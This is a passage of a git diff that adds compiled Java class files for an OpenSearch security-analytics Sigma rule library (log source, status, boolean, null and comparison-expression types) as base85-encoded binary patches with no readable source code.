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 literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/objects/SigmaLogSource.class b/bin/main/org/opensearch/securityanalytics/rules/objects/SigmaLogSource.class new file mode 100644 index 0000000000000000000000000000000000000000..37e55e142f2075328e2c18d6cd532513058d2d62 GIT binary patch literal 1945 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 literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/objects/SigmaStatus.class b/bin/main/org/opensearch/securityanalytics/rules/objects/SigmaStatus.class new file mode 100644 index 0000000000000000000000000000000000000000..ec5e1d33d9c770a25b44bd0a0030a7e3fdf4d394 GIT binary patch literal 1634 zcmbtU+iuf95Ix&moVbRT00mm^*Cdph0_BzfO;Z;NX%f|GMa0uKm|*1C$aX;a7JdSP z1PBD;nU6xuZVa`!ywDf#p7qR`GdnZ;?fb_s0IuPIf-#1hp5N8I=aw5--0wWq1FO^b z?Qp#%OdS-RPKsW7fkDDP6`+1wuzPe`ATa_9^vSpYp26fqJt{c@#%UEU@->91#&1PeLgpB&e+UdJ+?APsbI)y*o%FXYdJER%Gb8~k9(;CL1F-+8K*Q)n>TbAGA zTaHBvso7}ermWL`5$dS_UsU0w6LT{vmVPC%Rr#_L$tcD9Hl8eiGRu($u6FM(D9xR7>eoG>*zM~<&U0R%{CQHzBlU_U|#sHv|CP1## z{Botfmn*eAFgYz6o;*@C9J{ca{3i&#LXy5f_Y+tbF{lcvMMyLXQh>}q}L!4I#20}gq7m?!|!o!nR8SY_KuJ?ZcK+Jz- literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/types/Placeholder.class b/bin/main/org/opensearch/securityanalytics/rules/types/Placeholder.class new file mode 100644 index 0000000000000000000000000000000000000000..ef72d68099d7d909d9bd4e7bb897f482b8349abd GIT binary patch literal 535 zcmbVJO;5r=5Pe$;l~O)L#IrZR#2z(jyqItzXoBIslucQ(v}C(A;a_Q@G4bFJ@JAV^ z3yCJ&JnZazym|X(_UrrO6Tk&dJU9%OsgA>REs{)d9WBC4M7fq`!xOGHMn+kvb0xCS zY}RBS6pzFrRdb;|xD2f&f8wFyNgUqKmLf6?Zo*fBp*{L7O^lXFe9cg~k%=_749C6w za(_zAcj;XCD4`a>L%>k#^`})ZGy;@SVQ7wIBF6b@CiEkpDf>_waW&;y7V$3WnuW|5 zu15czj>LMgFk?GQr`O+?%ivGaTt{Lk3mL6Ht2r-5$0^A!(WV)kLOXd5`5q3)Rw)`% z?9lBG-szmZq5fhqO|lK!>BB{humM_>>u%9FM4KY&v#gBRj?me0hIBKkl?Sh=Ka=C2 TpsUzq)6xW6z>bE#!lJrAa5r^N literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/types/SigmaBool.class b/bin/main/org/opensearch/securityanalytics/rules/types/SigmaBool.class new file mode 100644 index 0000000000000000000000000000000000000000..44a61b0a01a02fa6ee4758790e211616bb4e2015 GIT binary patch literal 711 zcmbVJ%TB^T6g>k-OD&)%zVO8kSlGmcnrK{T!iwku!h+pUM;udH(+3Ivx0UV;LA;oau`2)+l6K){5Z{Jvfup?iFWA1Wi97;Q| z{Kyf36^`%7w&h^R&pgl3kYQN3SgJET}@c{X>t+?NVZ zf|>9}1`J27|8;)MV8~!rDpf(n>Y>*Ted!JumTUFaY%odm*uVxhHB^2KEqODsg>43H z#GOc7UNe-b-@gjH*xuC2J)NJ!85n4&Iv4mwp#EVsFHz?CvqG^$5^fuRcLh+t1iCi`g nF2pisk}#2BSj8GeR6+aX6H??9+_ePMZq+p2TV@DCmORz$5~7E5cNtsgip_dLSA;SzBcUg>VTuu`qc{A`(ZQ9Xm|{XUE^jFs%RbV|xyNtxOtKgq2I9iuX&#?W6D zHs5SD_PBe`+^bWT;^n4g*0)So$Z>a4@%M$tuv&ie+`n2^N_DK_o7R^brW0VRn0Teo zor*B1R?}{C*JrqxN}n!CAKqhNhK4Ih=}05P5b>P4Apgl;72NIxah+i$mD--3*Zcebw?s-Eeu09~gH{-{-Ea zV+Q#^QNs~3#kpP#I|NVfUXTF_I_5A>7!A|6_Bl1r?8_L%ebcS*uUg!;_(C^ZFClGo zHWAWIe4yg}9#p$7Iu>y2Bn(xYTJpYzMJ%gWVz}_)`@Db^TKHtx(Q<#IWrp!p+=*Z!+#Wv@JE+2Nk85X23Z$MQ;q*r64auWOH=9B>ofsOQ?~Zi5Mb_8k8KVE?%oFryvcDjn z`5EzJTzrJsuh2h_4?n@%zx_lWVT{pth){uk!W$sGI0oq%M}l6t79im=-k}j;2C*5E zWcP#pLrx(TOeKOKI#=;7eI*Hl{*3++8T&^vLP4x(FgYAx>m7$KwkEF?nvt9TBxaJ+ zYUX!D!jCiYYe$$Y$Fs-CZCuZW^GBH7%pKvzBe|M=7Wp0{StWmr59gJH@*T8G@ zU&I=59VD6SxJ}wdY3E1ym}2EgK?$EwoFv5?f)ag>aTTAcm{M``Z@LQqqMZ!o*Gtt* Nk5n;i5OfHe{{o%{pW*-j literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/types/SigmaCompareExpression$CompareOperators.class b/bin/main/org/opensearch/securityanalytics/rules/types/SigmaCompareExpression$CompareOperators.class new file mode 100644 index 0000000000000000000000000000000000000000..e623ea904be20506ab90ea63e2ffc500eef78897 GIT binary patch literal 710 zcmcJNOHbo46orrbplPQJZ|1?wFas=r1zED7u!$HzieS;GdpC1cj8Z$Y9YlW?D*G8=-9G@>$7TyPfyCHRXmZkyq)jhFM`>Y|pGYmUiC3u$ zZIO`+{UqnwSEI3v%s7{pj&E{H&MBj}UX+WRtn|jZ78(NcSMpkhnbf23Vt7TV7pTRF zz+(Jr^u1MjbRaMr8ST8(eju}g0<;B0PoN$r#{s(B**oNNk_4Dz=ZKw?(phBjh@F|9 z(#n_e_Rc_{5t)C~K^L=H15r!c9^2GXjMU&MyLR8C+Je?%yJ z%TC`EHl@F+oM7$!F!#!I1iEKhlZ`Uz9C4n%1)~2j6u-*bw-N}>$@x>`JpOfgc5PfSqag&%PO;bJ!loonO0>U?tpyCo02`My(M3Fdd%*x%$SzEhKMgA2? zR7f270sJV$tP=quxg@f7W@py(-hAx-{Pq0@fR{M+;V|@49fxTqlo4DCe z@FQYkD683YA~eIR{^k%DMeJ(^C(Rg|{lBRVb1hX&C*?D#Wd4R>(B7V46}U5I@OtS- zQH6_ofEpSMZo4zCfD#GdW5@1V0V=36)caD2MYbb8NvQ5-KaF@Y=2}{N>GbkTX&BD8 z$aG~`RC^^B`GS<;tlilH^-qIK1T~-@w+LoUm#f2crX%rI+S2Z?zdg@w97FIC!XEgywmwsf&$OSM5TW{JpRj&ftXR3a7YcDqk+u-AQdgZ(c>zyZl7Jd!Pv2Lx~%ySPIVI9`O2b(bsxC}>!* zvqTON+{59LCM0doO5Ly6`%D{$;DB=BJS+fhM)boHkXnrgK$FAbc0}l%tdMyv7MMvI+bfj_PA=^3M5b^ z7CZnCh4_6@q0WkSF>@|6^M7;B%&*@+egfFTvo0)wX_7AdWU1mz$uvCnGZp5kHY*v+ zXk~Pm`Dq@h%r~ng=R>_Xm9Nj2GR|}ochMHuI+176k7T^?Kg>^5Xu7ZkUi`o85eWkJ znT&FkQ8y@sbE6|a(3zPEIK;=&bHM2K> z6?*Mg$!F!Fg{>ZLV_Tp#8qXXM-$NI-1p0xF)%*N(uF@kpk65l3B%zFEGSx*~C)?&& zvr{jxQTpW@vijjwZ9YS-?_|o%>gRA4e|>K>ZnjAvSWDiZO9Jj;lBc11ql@YXSO48^ z@iXw84Qp|9IIN;?v<`o^g`%~Bo$b-DG8@?B$|uGatvk6uf3ou(-d9E~+~K@Q3v8fG z&p{t|84au5wD%bCTur%8zehrqap?&>SfhQcX?BC;mZ~1_J@|)WUsCKfN|C835Alen mtC}8{HTfkS=uE!B`@$<(WjS_vyo+ literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/types/SigmaNull.class b/bin/main/org/opensearch/securityanalytics/rules/types/SigmaNull.class new file mode 100644 index 0000000000000000000000000000000000000000..1364acfd508448467a66e9edbb19651c3b8784b5 GIT binary patch literal 652 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 